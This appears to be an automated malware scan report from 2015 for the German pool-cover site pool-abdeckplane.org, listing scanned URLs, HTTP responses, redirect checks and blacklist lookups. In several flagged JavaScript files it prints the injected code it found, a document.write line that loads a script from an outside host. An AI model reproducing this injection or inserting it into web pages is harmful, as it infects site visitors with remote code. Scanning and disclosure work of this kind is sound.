Scanned pages/files
Request | Server response | Status |
http://pool-abdeckplane.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:29 GMT Location: http://www.pool-abdeckplane.org/ Server: Apache Vary: Accept-Encoding Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/ | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/templates/xtc5/javascript/jquery.js | 200 OK Content-Length: 57495 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://pool-abdeckplane.org/templates/xtc5/javascript/thickbox.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:30 GMT Location: http://www.pool-abdeckplane.org/templates/xtc5/javascript/thickbox.js Server: Apache Vary: Accept-Encoding Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/templates/xtc5/javascript/thickbox.js | 200 OK Content-Length: 5653 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://pool-abdeckplane.org/templates/xtc5/javascript/tweet_it.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:31 GMT Location: http://www.pool-abdeckplane.org/templates/xtc5/javascript/tweet_it.js Server: Apache Vary: Accept-Encoding Content-Length: 277 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/templates/xtc5/javascript/tweet_it.js | 200 OK Content-Length: 1680 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:31 GMT Location: http://www.pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown.js Server: Apache Vary: Accept-Encoding Content-Length: 285 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown.js | 200 OK Content-Length: 18552 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown-de.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:32 GMT Location: http://www.pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown-de.js Server: Apache Vary: Accept-Encoding Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/templates/xtc5/javascript/jquery.countdown-de.js | 200 OK Content-Length: 802 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://pool-abdeckplane.org/stmenu.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:32 GMT Location: http://www.pool-abdeckplane.org/stmenu.js Server: Apache Vary: Accept-Encoding Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/stmenu.js | 200 OK Content-Length: 19601 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id=731993'></"+ "script>"); | ||
http://pool-abdeckplane.org/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:32 GMT Location: http://www.pool-abdeckplane.org/index.php?q=test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 266 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/index.php?q=test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 27 Jan 2015 23:11:33 GMT Location: http://www.pool-abdeckplane.org/?q=test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 257 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.pool-abdeckplane.org/?q=test404page.js | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/advanced_search.php | 200 OK Content-Length: 14464 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/includes/general.js | 200 OK Content-Length: 5246 Content-Type: application/javascript | suspicious |
Suspicious code found /*cgqyccgqyc0950526cgqyc09*/ document.write("<script type='text/javascript' src='http://dizgeinsaat.com/cpTZbrVL.php?id='></"+ "script>"); | ||
http://www.pool-abdeckplane.org/Info/ | 200 OK Content-Length: 10226 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/Info/templates/xtc5/javascript/jquery.js | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/Info/templates/xtc5/javascript/templates/xtc5/javascript/jquery.js | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/Info/templates/xtc5/javascript/templates/xtc5/javascript/templates/xtc5/javascript/jquery.js | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
http://www.pool-abdeckplane.org/Info/templates/xtc5/javascript/templates/xtc5/javascript/templates/xtc5/javascript/templates/xtc5/javascript/jquery.js | 200 OK Content-Length: 12755 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pool-abdeckplane.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 27 Jan 2015 23:11:29 GMT
Location: http://www.pool-abdeckplane.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
GET / HTTP/1.1
Host: pool-abdeckplane.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 27 Jan 2015 23:11:29 GMT
Location: http://www.pool-abdeckplane.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
...240 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pool-abdeckplane.org
Referer: http://www.google.com/search?q=pool-abdeckplane.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pool-abdeckplane.org
Referer: http://www.google.com/search?q=pool-abdeckplane.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pool-abdeckplane.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pool-abdeckplane.org/
Result: pool-abdeckplane.org is not infected or malware details are not published yet.
Result: pool-abdeckplane.org is not infected or malware details are not published yet.